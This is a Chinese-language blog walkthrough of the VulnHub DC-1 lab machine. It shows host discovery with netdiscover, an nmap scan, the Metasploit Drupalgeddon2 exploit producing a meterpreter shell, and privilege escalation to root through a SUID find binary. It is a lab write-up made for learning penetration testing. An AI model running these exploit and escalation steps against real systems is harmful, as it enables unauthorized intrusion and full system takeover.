vulnhub之dc1的实践

  • A+
所属分类:安全文章

这个十一假期比较懒,假期最后一天的下午才赶了一篇blog,实践的是vulnhub的dc1镜像,

下载地址,https://download.vulnhub.com/dc/DC-1.zip,

workstation导入启动就能获取到地址,省的换virtualbox了,

当然workstation导入启动就能获取到地址这个事儿是通过地址扫描确认的,sudo netdiscover -r 192.168.137.0/24,拿到了靶机地址192.168.137.11,

vulnhub之dc1的实践

接着做端口扫描,sudo nmap -sS -sV -T4 -A -p- 192.168.137.11,

vulnhub之dc1的实践

发现存在Drupal应用,就直接上metasploit里搜利用吧,

msfconsole,search drupal,

vulnhub之dc1的实践

这里选择了exploit/unix/webapp/drupal_drupalgeddon2进行攻击,为啥直接选这个,是参考了别人的writeup,说试了前两个没反应,我也就不浪费那个时间再验证一遍了,最近确实比较懒,哈哈,

use exploit/unix/webapp/drupal_drupalgeddon2,
show options,查看一下还需要设置哪些参数,
set RHOSTS 192.168.137.11,就设置个靶机地址即可,
exploit,

这就轻松的拿到meterpreter反弹shell了,

vulnhub之dc1的实践

getuid,发现不是root,接下来就想办法提权,
shell,python -c 'import pty; pty.spawn("/bin/bash")',

先转成可交互的shell,再查找一下有哪些有root权限的程序,

find / -perm -u=s -type f 2>/dev/null,

vulnhub之dc1的实践

find的这个程序非常好,随便找一个可读的文件吧,重新弹一个shell出来,

/usr/bin/find /var/www/COPYRIGHT.txt -exec /bin/sh ;

vulnhub之dc1的实践

至此拿root权限成功。

本文始发于微信公众号(云计算和网络安全技术实践):vulnhub之dc1的实践

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: